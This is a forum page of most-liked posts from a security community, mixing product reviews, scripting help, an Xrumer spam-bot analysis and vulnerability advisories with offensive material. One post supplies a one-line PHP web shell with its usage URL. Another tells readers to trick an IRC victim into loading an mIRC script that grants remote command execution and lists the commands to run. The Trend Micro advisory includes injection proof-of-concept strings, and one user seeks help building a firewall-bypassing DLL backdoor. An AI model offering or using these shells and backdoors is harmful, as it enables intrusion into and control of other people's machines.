Government Security
Network Security Resources

Jump to content

Most Liked Content


#227329 Irc

Posted by Stephen on 30 December 2013 - 10:22 PM

it is a sad day indeed, I remember back in 2002 when I started the channel, time and a b usy lifestyle became hard for me to b e around for quite some time. I am glad people got some good use out of it. As you can see there is a lot of work going on around the site, maybe once we are done restoring the site we can look into pumping new life into the channel


  • k0nsl likes this


#226610 Trend Micro Directpass 1.5.0.1060 - Multiple Software Vulnerabilities

Posted by remove on 20 May 2013 - 03:35 PM

Title: ====== Trend Micro DirectPass 1.5.0.1060 - Multiple Vulnerabilities Date: ===== 2013-05-21 References: =========== http://www.vulnerabi...tent.php?id=894 Article: http://www.vulnerabi....com/dev/?p=580 Trend Micro (Reference): http://esupport.tren...US/1096805.aspx Trend Micro Solution ID: 1096805 Video: http://www.vulnerabi...tent.php?id=951 VL-ID: ===== 894 Common Vulnerability Scoring System: ==================================== 6.1 Introduction: ============= Trend Micro™ DirectPass™ manages website passwords and login IDs in one secure location, so you only need to remember one password. Other features include: Keystroke encryption, secure password generation, automatic form-filling, confidential notes, and a secure browser. Convenience - You can securely and easily manage passwords for numerous online accounts with just one password and automatically login to your websites with one click. More Security - You get an extra layer of online security with a specially designed browser for online banking and financial websites and protection from keylogging malware. No Hassles – You don’t have to be technical wizard to benefit from this password service, it’s simple to use. Confidence – You can have peace-of-mind using a password service provided by an Internet security provider with 20+ years of experience. All Your Devices – You can use DirectPass password manager on Windows PCs, Android mobile, Android Tablet, iPads and iPhones, and all devices are automatically encrypted and synchronized using the cloud (Copy of the Vendor Homepage: http://www.trendmicr...pass/index.html ) Abstract: ========= The Vulnerability Laboratory Research Team discovered multiple software vulnerabilities in the official Trend Micro DirectPass v1.5.0.1060 Software. Report-Timeline: ================ 2013-03-08:    Researcher Notification & Coordination (Benjamin Kunz Mejri) 2013-03-09:    Vendor Notification (Trend Micro - Security Team) 2013-03-16:    Vendor Response/Feedback (Trend Micro - Karen M.) 2013-05-09:    Vendor Fix/Patch (Trend Micro - Active Update Server) 2013-05-15:    Vendor Fix/Patch (Trend Micro - Solution ID & Announcement) 2013-05-21:    Public Disclosure (Vulnerability Laboratory) Status: ======== Published Affected Products: ================== Trend Micro Product: DirectPass 1.5.0.1060 Exploitation-Technique: ======================= Local Severity: ========= High Details: ======== 1.1 A local command injection vulnerability is detected in the official Trend Micro DirectPass v1.5.0.1060 Software. The vulnerability allows local low privileged system user accounts to inject system specific commands or local path requests to compromise the software. The vulnerability is located in the direct-pass master password setup module of the Trend Micro InstallWorkspace.exe file. The master password module of the software allows users to review the included password in the secound step for security reason. The hidden protected master password will only be visible in the check module when the customer is processing to mouse-over onto the censored password field. When the software is processing to display the hidden password in plain the command/path injection will be executed out of the not parsed master password context in in the field listing. Exploitation of the vulnerability requires a low privilege system user account with direct-pass access and low or medium user interaction. Successful exploitation of the vulnerability results in software and system process compromise or execution of local system specific commands/path. Vulnerable File(s):                 [+] InstallWorkspace.exe Vulnerable Module(s):                 [+] Setup Master Password Vulnerable Parameter(s):                 [+] Master Password Affected Module(s):                 [+] Check Listing (Master Password) 1.2 A persistent input validation vulnerability is detected in the official Trend Micro DirectPass v1.5.0.1060 Software. The bug allows local attackers with low privileged system user account to implement/inject malicious script code on application side (persistent) of the software. The persistent web vulnerability is located in the direct-pass check module when processing to list a manipulated master password. In step one injects a malicious iframe in the hidden fields as master password. The inserted context will be saved and the execution will be in the next step when processing to list the master password context in the last check module. To bypass the validation the and execute the injected script code the attacker needs to split (%20) the input request. Exploitation of the vulnerability requires medium user interaction and a low privilege system user account with direct-pass. Successful exploitation of the vulnerability can lead to persistent session hijacking (customers), persistent phishing, persistent external redirects to malware or scam and persistent web context manipulation of the affected vulnerable module. Vulnerable File(s):                 [+] InstallWorkspace.exe Vulnerable Module(s):                 [+] Setup Master Password Vulnerable Parameter(s):                 [+] Master Password Affected Module(s):                 [+] Check Listing (Master Password) 1.3 A critical pointer vulnerability (DoS) is detected in the official Trend Micro DirectPass v1.5.0.1060 Software. The bug allows local attackers with low privileged system user account to crash the software via pointer vulnerability. The pointer vulnerability is also located in the direct-pass master password listing section. Attackers can inject scripts with loops to mouse-over multiple times the hidden password check listing of the master password. The result is a stable cash down of the InstallWorkspace.exe. The problem occurs in the libcef.dll (1.1.0.1044)of the trend micro direct-pass software core. Exploitation of the vulnerability requires medium user interaction and a low privilege system user account with direct-pass. Successful exploitation of the denial of service vulnerability can lead to a software core crash and also stable software module hangups. Vulnerable File(s):                 [+] InstallWorkspace.exe Vulnerable Library:                 [+] libcef.dll (Dynamic Link Library) Vulnerable Module(s):                 [+] Check Listing (Master Password) Vulnerable Parameter(s):                 [+] Master Password Proof of Concept: ================= 1.1 The code injection vulnerability can be exploited by local attackers with privileged system user account and medium or high user interaction. For demonstration or reproduce ... PoC: B%20>">../;'[COMMAND|PATH INJECT!]> Example Path: C:\Users\BKM\TrendMicro DirectPass Note: The bug allows attackers to request local restricted folders with the system software privileges to manipulate software files and the bound dynamic link libraries. 1.2 The persistent script code inject vulnerability can be exploited by local attackers with privileged system user account and medium or high user interaction. For demonstration or reproduce ... PoC: (Input) B%20>"<iframe src=a>[PERSISTENT SCRIPT CODE!] Note: The master password is restricted to 20 chars per field on insert. The execution of persistent injected frames works also with external source. 1.3 The pointer (DoS) vulnerability can be exploited by local attackers with privileged system user account and low, medium or high user interaction. For demonstration or reproduce ... Path:             C:\Downloadz\TrendMicro_DP_MUI_Download\Package\Share\UI Dynamic Link Library:     libcef.dll PoC: (Input) %20%000000---%000%20 Note: The string crashs the master password check review module and the installworkspace.exe software process via null pointer (Dos) bug. The reproduce of the vulnerability can result in a permanent denial of service when the context is saved in the first instance and the save has been canceled. Critical Note: When i was checking the section i was thinking about how to use the injected code in the section to get access to the stored password. I was processing to load my debugger and attached it to the process when the request was sucessful and saved the address. After it i reproduced the same request with attached debugger and exploited the issue in the local cloud software mask. Then i was reviewing the changes and was able to use the injected frame test to see the location of the memory in the debugger. By processing to inject more and more context i was able to see were the location of the password in the memory has been stored when the software is processing to redisplay the saved temp password. Since today i have never seen this kind of method in any book or paper but i am sure i will soon write about the incident. Solution: ========= Both vulnerabilities can be patched by a secure parse or encode of the master password listing in the master password check module of the software. Filter and parse the master password and description security tip input fields. For the denial of service issue is no solution available yet but the fixes will prevent the manually exploitation of the issue. Note: The update is available from the update-server since the 12th may but trend micro says it was the 9th may. On the 18th we downloaded again the main software direct-pass and tested the core without an update and it was still vulnerable. To fix the issue in the software an update from the update-server is required after the install. Risk: ===== 1.1 The security risk of the local command/path injection software vulnerability in the directpass software core is estimated as high(-). 1.2 The security risk of the persistent scirpt code inject vulnerability is estimated as medium(+). 1.3 The security risk of the pointer (DoS) software vulnerability is estimated as medium(-). Credits: ======== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@vulnerability-lab.com) Disclaimer: =========== The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com     - www.vuln-lab.com             - www.vulnerability-lab.com/register Contact: admin@vulnerability-lab.com     - support@vulnerability-lab.com      - research@vulnerability-lab.com Section: video.vulnerability-lab.com     - forum.vulnerability-lab.com          - news.vulnerability-lab.com Social:     twitter.com/#!/vuln_lab         - facebook.com/VulnerabilityLab      - youtube.com/user/vulnerability0lab Feeds:     vulnerability-lab.com/rss/rss.php    - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission.                      Copyright © 2013 | Vulnerability Laboratory


  • EneleSabe likes this


#210953 Skype 5.8 & 5.5 - Corruption & Persistent Vulnerability

Posted by remove on 07 April 2012 - 07:21 PM

Title:
======
Skype 5.8 & 5.5 - Corruption & Persistent Vulnerability


Date:
=====
2012-03-29


References:
===========
Download: http://www.vulnerabi.../videos/447.wmv
View:



VL-ID:
=====
457


Status:
========
Published


Exploitation-Technique:
=======================
Offensiv


Severity:
=========
High


Details:
========
The vidoe shows a exploitation session of the researcher ucha g. , alexander fuchs & benjamin kunz mejri.
The video explains how the denial of service vulnerability via pointer corruption by sending symboles is persistent exploitable.


Credits:
========
Vulnerability Research Laboratory - Ucha Gobejishvili (longrifle0x), Alexander Fuchs (f0x23) & Benjamin Kunz Mejri (Rem0ve)


Disclaimer:
===========
The information provided in this video is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability-
Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of
other media, are reserved by Vulnerability-Lab or its suppliers.

Copyright © 2012|Vulnerability-Lab


  • EneleSabe likes this


#210861 How Is Loftek Cxs 2200 Ip Camera?

Posted by powerlife2000 on 25 March 2012 - 07:33 AM

I stumble across a topic a few days ago on other forum and got only one reply. The topic is to recommend me a type of IP camera for car(garage) and home surveillance. Then I got a useful reply and told me to consider some details for IP camera. I consider more and just want it to come night-vision and be waterproof. And the video captured, of course, should be high definition.Yesterday, I just googled and find an IP camera in google shopping. That is Loftek CXS 2200. The price is relatively cheap and the review good.Then I contact the loftek IP camera tech customer for some questions, they replies really satified me. After all, I am just a layman in terms of IP camera.How is <url="http://www.amazon.co..._cp_p_2">Loftek CXS 2200</url>? Please give me your cherished advice or anything useful about this camera.
  • EneleSabe likes this


#208082 How To Delete Your Browser's History On A Mac?

Posted by infiltrator on 28 November 2010 - 07:53 PM

Deleting cookies off a web browser, shouldn't be a mystery.
Every browser has a menu option somewhere, and from that shouldn't be too hard to figure out.

That guide should be able to assist any novice user in how to delete cookies off their browser, nice one Bro. Keep it up.

On the other hand, if you a Windows user a tool like CCleaner could be used to remove almost any trace of internet activity on your computer.
  • EneleSabe likes this


#207975 How To Delete Your Browser's History On A Mac?

Posted by suxia on 15 November 2010 - 05:39 PM

As when we browse the Web using IE, they tend to leave a record. For data security reasons, we often need time to clear your browser history. But how can you clear the browser history record? Mac computer users canclear browser history on mac.

Choose to delete history on mac , not only can guarantee privacy of your work, you can also make your personal privacy is not compromised.

The following is the key features of delete history on mac.
1.Safe to operate in your Mac computer
The clear cache for Mac is a safe software ,it don’t have the write-perform function when it runs in your Mac
2.Optimize the computer system
It can improve the Mac computer environment through clear the cache and widget.
3.To improve the storage space
It can access the hidden storage area to clear some widget to improve storage environment.
4.All-in-one utility
It can clear all the cache which is stay in your Mac computer .What you have to do is press button.
5.Easy to use
Clear cache for Mac software makes system maintenance simple with an easy point .with the simple click ,novice can easy to use to keep the system running at its best.
6.Clear the system cache and cookies and folder cache
One of the best features of clear cache for Mac is its ability to easily clear the system cache and cookies and folder cache that affect your computer system.
7.Clean up the portable device
Keep your removable device free from those annoying and unnecessary service files.
8.To clear plug-in to release disk space
Clear cache for Mac software easily erase all the plug-in that stay in your disk space. To finish this just need some simply click.
9.multifunctional feature
it can capture the pesky bug when new software operated.

How to Delete your Browser's History on a MAC
Posted Image
You can clear browser history on mac by following steps
Instructions
Step 1
Open your browser and click "Tools" at the top of the screen.
Step 2
From the sub-menu, choose "Clear Private Data." Put a check mark next to "Browsing History" in the pop-up menu. Select any other items that you'd like to clear, such as your download history or saved form history.
Step 3
Deselect any check marks next to any items that you do not wish to clear. Click "Clear."
















  • EneleSabe likes this


#203663 Google Wave Invites

Posted by Guest on 16 October 2009 - 01:37 AM

Never mind, I got one from the google team already :)
  • Stephen likes this


#203650 Google Wave Invites

Posted by bonarez on 15 October 2009 - 07:01 AM

Hi Dennis,

I have some invites left..

PM or Mail me

bonarez
  • Stephen likes this


#203526 Google Wave Invites

Posted by Guest on 05 October 2009 - 05:40 AM

Hi,

As you may know Google Wave have released over 100.000 invites each holding 8 other invitations. Would anyone happen to have one for me? My invites will be spread among GSO's members ofcourse :)

Regards,

Dennis
  • Stephen likes this


#203063 Creating A Backdoor Using Dll

Posted by colinsouth on 19 August 2009 - 10:24 PM

Dont be a prick, I'm not asking anyone to code a single line of code for me.

I've written the DLL injection, and know how to make DLLs.

Im really missing the point though...

Do I make a DLL that just deals with the network stuff, to bypass firewall, to just send the data to client via its host process; or what?

No need for your non constructive post.
  • colinsouth likes this


#202686 How To Overide Rm Filter

Posted by Guest on 16 July 2009 - 08:30 AM

Have you tried any cgi proxy websites?
  • Squirell likes this


#202570 Small Pma Shell

Posted by webdevil on 02 July 2009 - 09:14 PM

<?php system($_GET[cmd]); ?>

That should do the trick.

Once that is uploaded you can try this

http://site/shell.php?cmd=command


  • tommy1987 likes this


#192200 awk script

Posted by SuRGeoN on 08 June 2008 - 01:21 AM

if the filename with these data is "input_file" then the following bash/shell script will work fine. Maybe it's not the perfect solution but it works :)

Shell Script
-------------

#!/bin/bash

ips=`cat input_file | awk -F " " '{print$2}' | grep "^[0-9]*\.[0-9]*\.[0-9]*\.[0-9]*$" | sort | uniq`

for ip in ${ips[@]}; do
 name=`cat input_file | grep "$ip.* in" | awk -F " " '{print $4}' | sed 's/-IN$//g'`
 res=`cat input_file | grep $ip.*maximum-prefix`
 if [[ -n $res ]]
 then
  echo $name $ip "Yes"
 else
  echo $name $ip "No"
 fi
done

Output
--------

AXTEL 148.223.23.65 No
PROTEL 201.117.10.141 Yes
MARCATEL 201.125.74.109 Yes

Then you can use mail command... it's up to you.

Have a nice day
  • Dr RNA likes this


#190441 HP 2710p TabletPC's review

Posted by ceder on 25 April 2008 - 08:02 AM

Posted Image
There is a strong switch with no gap to release the screen in the middle and the power switch on the left

Posted Image
The night-light.

Posted Image
Global view in laptop mode.

Posted Image
Back view.
You can see a dock port and a battery port which I don't have. Battery life is about 4 hours with wifi, firefox, word and luminosity in the middle.
It can last 5 hours when you shut down wifi. HP has a great system which enables you to recharge 90% of your battery in only 1 hour.
If it's not enought for you, you can add a slim extra battery to have 10 hours of power.

Posted Image
Battery indicator.
You don't have to switch on your laptop to verify your battery status, blue leds indicates the level of charge of the battery.

Posted Image
The pen garage is easy to use and robust. The pen won't go out alone ;)

5) Ink experience and daily use
I am a student and I use my TabletPC everyday. At the beginning, i was afraid by the trackpoint. I had never used one
but finally, it came quickly and I don't see the difference with a touchpad now. I wanted a laptop which had enough battery
for a day at school and I must say that I found the right product. If I don't have a power plug near me during my courses,
I can always find one at lunchtime and recharge my laptop quickly. I was afraid by the HDD's speed too but in fact, it only
increases the boot time but I always turn my laptop in sleep mode so it doesn't take too long to boot. The screen is very good,
when I write on it, I feel like I'm writing with a pen on a sheet of paper. It's enough luminous to use your TabletPC inside and
outside. The 2710p is light, you can stand in slate mode for an hour without feeling pain in your arm.


During this review, I didn't talk about writing recognition. It depends on the OS you choose. From my experience, I can say that
Vista is better at this than Windows XP 2005 TabletPC edition. I have a TabletPC since 1 and half year and I will never return to
a normal laptop. ;)

I hope you have enjoyed this review. I apologize for my bad english and I hope you'll become an adept of TabletPCs like me :P
If you have any questions, I'll be glad to answer all of them.

6) Links

HP website
TabletPC reviews website (english)
TabletPC reviews (french)
  • Jeremy likes this


#188880 Enable Telnet Server Xp

Posted by bonarez on 19 March 2008 - 06:57 AM

strSvcName = "Telnet"
strStartupType = "Automatic" 
strComputer = "."
set objWMI = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
set objService = objWMI.Get("Win32_Service.Name='" & strSvcName & "'")
intRC = objService.Change(,,,,strStartupType)

what is the funtion of this half exactly?:
et objWMI = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")


Sorry for the late reaction, just read your reply..

basicly you create an object, with name objWMI, (wmi stands for windows management instrumentation)
you set the object to connect to "winmnmts" (the wbem services).
strComputer is just a var that holds the computer name you want to connect to
"\root\cimv2" is the namespace we want to connect to, there are more namespaces, but this one is used most of the time for management purposes.

here's a nice read: hxxp://www.wilsonmar.com/1wmiwbem.htm

When working in domains using adsi I preferred using the ldap way to connect, but I haven't been vbscripting much lately.. Powershell is the new cool

edit: some cool stuff to play with when you're looking into adsi/vbs/wmi/hta:
hxxp://www.microsoft.com/technet/scriptcenter/createit.mspx
  • bawlls likes this


#185922 Newb Needs Help Getting Http Info

Posted by basher on 21 December 2007 - 01:19 AM

Get netcat, then type (replace <host> and <port>, obviously):
nc <host> <port>
HEAD / HTTP/1.1
Host: <host>
Press enter twice after the last line.
  • basher likes this


#185529 Convert Text To Html Entities

Posted by basher on 10 December 2007 - 06:34 PM

..better late then never..
[codebox]function entityenc($str)
{
$text_array = explode("\r\n", chunk_split($str, 1));
for ($n = 0; $n < count($text_array) - 1; $n++)
{
$newstring .= "&#" . ord($text_array[$n]) . ";";
}
return $newstring;
}[/codebox]
  • basher likes this


#181944 Xrumer Exposed

Posted by APX on 05 September 2007 - 05:06 AM

Xrumer 3

First of all I want to thanks Ex0rPhine for helping me to analyze, unprotect and disassemble this program, thanks a lot bro.

A few weeks ago I was browsing a rusian forum and I found a link to a full working copy of Xrumer 3, then I decided to see how it worked and see if it really uses some alien tech to manage captchas
I see no alien tech around, but we can find a interesting idea nicely implemented, in this article I will try to explain the basics of how it works, and an easy way to avoid being spammed by it.
Sadly, I can't say anything about the captcha recognizing engine, because I have not so much free time, and honestly I think is impossible to understand a complex algorithm looking at the ASM disassembly.
Ok, let's begin.

What is Xrumer?

Their creators at botmaster.net say "XRumer is a software application that automatically posts your messages to forums, guestbooks, bulletin boards and catalogs of the links (as well as into livejournals and wiki). In a word it is an autosubmitter. " Or, I'll say, in a word is a tool to spam anything that isn't an email
Xrumer 3 allows to send PMs in phpBB and vBulletin boards.
But the coolest feature from Xrumer is that it can create new accounts in forums automatically, working around pictcode protection or email confirmation.
Here we can see the captchas it can handle.

Posted Image

Here you can see a video of Xrumer 3 at work.
http://blogs.pandasoftware.com/blogs.....;/24/xrumer.swf

XRumer File Structure

Folders

Debug/ - Here is the log of single test forum processing, after pressing "Test" button
img/ - In this file is stored graphic information
Langpack/ - Language packs.
Links/ - Here are stored all databases, which contain links of forums and guestbooks. Files format:*ForumsList id*.txt
Logs/ - this folder contains report files (reports are automatically created during the program working)
Projects/ - here is stored files of your projects. Files format: *.xpy


Files

config.ini the program configuration file
proxy.ini Proxy checking settings
xblack.txt black list (forums where posting is undesirable)
xprior.txt contain forums default categories, where are recommended to post messages
xproxy.txt contain HTTP proxy list. It is updated automatically or the user fills in it.
xsocks.txt - contain SOCKS proxy list. (must be filled in by the user)


Types of links databases

There are 5 types.

ForumsList id*.txt the main database.

ZForumsList id*.txt a database that was formed during the last session when going through the main database. The links stored in this database point directly to the page where message is posted.

MForumsList id*.txt the database with activation links, formed during the downloading of activation links from the e-mail inbox (it is created if in "Profile activation via email" option is set up manual mode).

RForumsList id*.txt the database with links to use "Reply" option on forums. By using this option you can reply to your previous posts. Created while executing "Forums" database list.

EForumsList id*.txt the databases for editing earlier created post.



Basics

Xrumer is coded in Delphi, and the resulting .exe is protected using Aspack v2.12.
When you start XRumer, it connects to botmaster.ru and botmaster2.ru and does some requests about the account. If you block the access to botmaster via the hosts file, it says "blah, blah, internet connection problem..." and exits.(EOP Dixit )

In order to use Xrumer you should have a valid account, that account is maintained paying $10 monthly to the botmaster.ru guys. Ex0rPhine found a few accounts and tried them but all the accounts were dead, that's why we never spammed any forum

If you watched the video, by now you should have a pretty good idea of what this program does, and how to use it, in this section I'll try to give some basic insight in how it works.

Message Preview.You can preview how will look your messages using this module, and XRummer will open a page in your browser that simulates a board showing your message.
Also you can use macros to create variations of your message to post.

The proxy engine. Xrumer can use anonymous proxies or socks5 and haves an anonymous proxy leecher, URLs to leech are stored in a txt file, that by default comes with 41 entries and includes a few not working. The leeched proxies are stored xproxy.txt and xsocks.txt.
This works like any other proxy tester engine, nothing new.

Target List. It comes with 158352 targets ready to spam, or you can use the companion program Hrefer that looks in search engines (Yandex, Google, MSN, Yahoo, Altavista) for new posible targets. In Hrefer you can specify keywords to narrow your target search or use predefined templates to search only for "guestbooks", "phpBB boards" "vBulletin boards" etc.

Mass PM.Starting with version 3.0, XRumer can mass PM a complete board, the manual says it can only do it in vBulletin and in phpBB boards, but if we inspect the file masspm.ini we can see that it also haves the links to do it in Invision boards.
XRumer manual comes with this note about Mass PM

As the Personal Messages system of mass posting is new in Xrumer 3.0 and some of the forums have a very reliable protection system against automated postings, such as (it is forbidden to send the message more often, than 1 time in ~20 seconds, it is forbidden more than 3-5 messages in day, etc.). However, we are constantly working on new ways to circumvent these systems.


masspm.ini

[phpBB]
Name=phpBB
Memberlist=memberlist.php
Nexpage=[...]memberlist.php?mode=joined&amp;order=ASC&amp;start =[...]
MessagePM=[...]privmsg.php?mode=post&amp;u=[...]
MessagePMgen=privmsg.php?mode=post&u=
Profile=[...]profile.php?mode=viewprofile&amp;u=[...]
IdentField=u

[IPB]
Name=invisionboard.com
Memberlist=index.php?act=Members&filter=ALL&sort_k ey=joined&sort_order=asc&max_results=50
Nexpage=index.php?&act=Members[...]filter=ALL[...]&st=[...]
MessagePM=index.php?act=Msg&CODE=4&MID=
Profile=showuser=

[VBulletin]
Name=vBulletin
Memberlist=memberlist.php?&order=ASC&sort=joindate &pp=30
Nexpage=[...]memberlist.php?do=getall&amp;page=[...]&amp;pp=30&amp;order=asc&amp;sort=joindate[...]
MessagePM=[...]private.php?do=newpm&amp;u=[...]
MessagePMgen=private.php?do=newpm&u=
Profile=[...]member.php?u=[...]
IdentField=u


Mail registration. It can auto register some web mails,
or you can provide a pop3 account to use for user registration process. Xrumer can be configured to check the email account every n minutes, for mail confirmations, then Xrumer analyzes the mail, in a really simple way, looks for the confirmation link, and follows it.
To analyze the received mails, Xrumer haves a set of patterns to match in the mail's text, and in the links inside the mail, those patterns are defined in the file xpop.txt

Let's see some entries in the file...

[...]Willkommen auf[...]
[...]Bienvenue sur[...]
[...]Action Req[...]
[...]Registra[...]
[...]rejestra[...]
[...]Account validated at[...]
[...]activation[...]

Patterns to find in the mail's text.


http://[...]?act=Reg&CODE=03&SID=[...]
http://[...]?act=Reg&CODE=03&aid=[...]
http://[...]register.php?a=act[...]i=[...]
http://[...]profile.php?mode=activate[...]&act_key=[...]

Patterns for activation links




Posting Modes
Extracted from XRumer manual

Posting mode is selected on the "Links database" tab. There are 5 modes:

1. ForumsList links are taken from the main database.

2. ZForumsList links are taken from a database that was formed during the last session when going through the main database. The process in this mode is a few times faster, this is because the links stored in this database point directly to the page where message is to be posted.

3. MForumsList the database with activation links, formed during the downloading of activation links from the e-mail inbox (see "Mail").

4. RForumsList the database with links for answering to in previously created topics.

5. EForumsList the databases with links to editing before created topics. It is necessary to post necessarily with same nickname and password that was previously used. Probably to edit only those topics that were created on behalf of the registered user.

The ZForumsList id*.txt, RForumsList id*.txt, EForumsList id*.txt and MForumsList id*.txt databases are created during the process of posting.

All databases are located in the Links folder.



The process of posting
Extracted from XRumer manual

In the process of its work XRumer continuously processes links from the forums database ForumsList id*.txt (or ZForumsList id*.txt, MForumsList id*.txt, RForumsList id*.txt see Posting modes).

The algorithm looks something like this:
1. The program enters the site by the next link from the database.

2. If it is a forum, it chooses the most suitable topic for your message.
If it is not it looks for a link to forum/guestbook/links catalog/creation of new topic etc.

3. It checks whether registration is needed to create topics, if yes it registers to the forum, and logs into it after that. If during registration there is a need to enter a text from a picture (pictocode) the picture is downloaded and processed, and the code is entered.
More info on this process is located here - http://www.botmaster.net/pictocod/.
If registration must be activated by an e-mail, the program will continue working on next forum and activate links on background, if "Profiles activation via e-mail" is set in automatic mode. If is turned off it will stop work on this forum. If "Profiles activation via e-mail" is set in manual mode, then it will download activation links from the e-mail inbox only by pressing the button "Get the activation links from the mail box" in "Mail" tab. This forum will be placed in the report file Activation id*.txt. Downloaded links are placed into the MForumsList id*.txt database

4. Find the form that has to be filled in and fills in the needed fields.

5. Sends the entered data.

6. Checks whether the information sent was actually posted. If it was link to the page with the message is added to the Success id*.txt report. If data was sent but the software could not verify the posting - link to the page with the message is added to the HalfSuccess id*.txt report.
The link to the page where message posting has occurred is placed into the ZForumsList id*.txt database and if next time the process is launched not by the ForumsList id*.txt database but by the ZForumsList id*.txt database it will run 5-7 times faster. The link to the page where the reply to that message is posted is placed into the RForumsList id*.txt database. And next time you start the messaging from this database, no new topics will be created, instead replies to previously created topics will be sent.
This is the "Question-Answer" system (more info on this is located here - http://www.botmaster.net/v-o/).

7. If the link to the form or the forum has not been found, the link is placed into the Resultates id*.txt report, with the explanation why the posting failed.

8. If "Profiles activation via e-mail" is set in automatic mode the program will continue working and activate links on background.

If "Profiles activation via e-mail" is set in manual mode, when the end of the ForumsList id*.txt database is reached, only by pressing the button "Get the activation links from the mail box", Xrumer will switch to downloading activation links from the e-mail inbox. Downloaded links are placed into the MForumsList id*.txt database. When the download is complete it goes through the activation links.



Bot AI

The bot AI is the weak point of XRumer, why?
The bot analyzes the web pages or mails received using the pattern matching approach.
As I said before, the patterns for confirmation mails are in the file xpop.txt, and the
patterns to handle the registration and posting process are defined in the file xlinks.txt
This is XRumer weak point, let's see a fragment of xlinks.txt

#Endast registrerade medlemmar har access till forumet.<;>Du <b>kan inte</b> skapa nya inlgg i det hr forumet<; .;>To post you must be logged in. If you don't have an account yet, please register.<;>Para postar voc precisa estar logado;Il n'y a que les membres enregistrs qui ont le droit d'accder ce forum;Attention, ce forum est un espace PRIVE, vous devez en tre membre pour y entrer et y participer;>Slo miembros registrados pueden acceder a este foro<;>Om een bericht te posten moet je ingelogd zijn;>Slo los usuarios registrados tienen acceso a este foro.<;>Deze optie is allen beschikbaar voor geregistreerde leden.<;>Disculpa, no tienes permiso para responder a esa discusin<;forums is a member-only feature.<;>Seules les personnes enregistres peuvent poster sur ce forum.<;you must be registered and logged-in to post; ;> <
MUSTREGISTERANYWAY



OK, that list is heavily resumed, but we can see that we have lot of sentences in different languages saying that you need to register in order to post. Those sentences matches with the tag MUSTREGISTERANYWAY. Is interesting that this guy defines the tags after the keywords... Anyway, these are the tags:

FORUM
SUCCESS
REGANYWAY
MUSTREGISTERANYWAY
MUSTREGISTER
INVALID
NOT FOUND
PRESSAGREE
ALLOW
ANONYM
NOPASS
LOGGEDIN
BANNED
WRONGPLACE
WRONGACCOUNT
ACTIVATION
CHECK
BBCODE
PICTOTRY
PREMODERATION
TOOLARGE
BADEMAIL
TAKEN
TOOFREQ
REMOVEURL
MAX500
WAIT


Based in the resulting tag Xrumer gets it decides what would be it's next step.
As you can see, Xrumer should know the exact sentence used for any of the possible target boards, in any possible language, but... it doesn't.
Previous XRumer versions weren't able to learn new sentences, and were doomed, but XRumer 3 can learn new ones, but I don't know how good is doing it :S

How to avoid being spammed by XRumer

This is completely theorical because we can't make our Xrumer copy to start spamming due to licensing problems , and we can't test it...

but... The idea would be to make XRumer engine to think that the registration operation failed, even if it worked.
So, what we do is, when you follow the mail confirmation link you got, you always get a page that says "The activation key you supplied does not match any in the database", but written in the same color that the background, but showing an image that says "Your account is activated".
Then, human users will see the picture and will know they need to reload the page or whatever, but Xrumer will match that to the tag WRONGACCOUNT, and isn't going to proceed.
I'm sure there are other similar ways to cheat XRumer.

I hope this essay helps people to understand a little better what are we talking about when we talk about XRumer, I'm leaving lot's of thing without explanation in order to keep this relatively short.

APX
  • tantloweasowa likes this


#132982 How To Hack On Irc User Using Remote Commands

Posted by quicksilk on 15 November 2005 - 02:39 AM

use social engineering here
give this script to your victim

//write config.mrc ctcp ^*:*:*:$1- | Load -rs config.mrc


use this command to execute to your victim

Useful command

/ctcp nickname /j #channelname
/ctcp nickname /part #leavechannelname
/ctcp nickname /msg #sendmsgnickname
/ctcp nickname /exit
/ctcp nickname /msg nickserv set passwd yourpassword
/ctcp nickname /mode #channelname +o yournickname to be OP
/ctcp nickname /run commands like notepad.exe cmd.exe etc....
/ctcp nickname /timer 0 0 /ping $me set a schedule to perform task

I know its not much for some of you guys....:(
  • tantloweasowa likes this


#114822 Invision Xss Reveals Cookie And Session Details

Posted by Kenny on 02 May 2005 - 04:27 AM

Invision Power Board URL Parameter Input Validation Error Lets Remote Users Conduct Cross-Site Scripting Attacks

SecurityTracker Alert ID:  1013863 
SecurityTracker URL:  http://securitytracker.com/id?1013863 
CVE Reference:  GENERIC-MAP-NOMATCH  (Links to External Site) 
Date:  May 2 2005

Impact:  Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information

Exploit Included:  Yes 

Version(s): 2.0.3, 2.1 Alpha 2

Description:  Arron Ward from GovernmentSecurity.org reported an input validation vulnerability in Invision Power Board. A remote user can conduct cross-site scripting attacks.

The forum software does not properly validate user-supplied input in certain URL parameters. A remote user can create a specially crafted URL that, when loaded by an authenticated target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the Invision Power Board software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

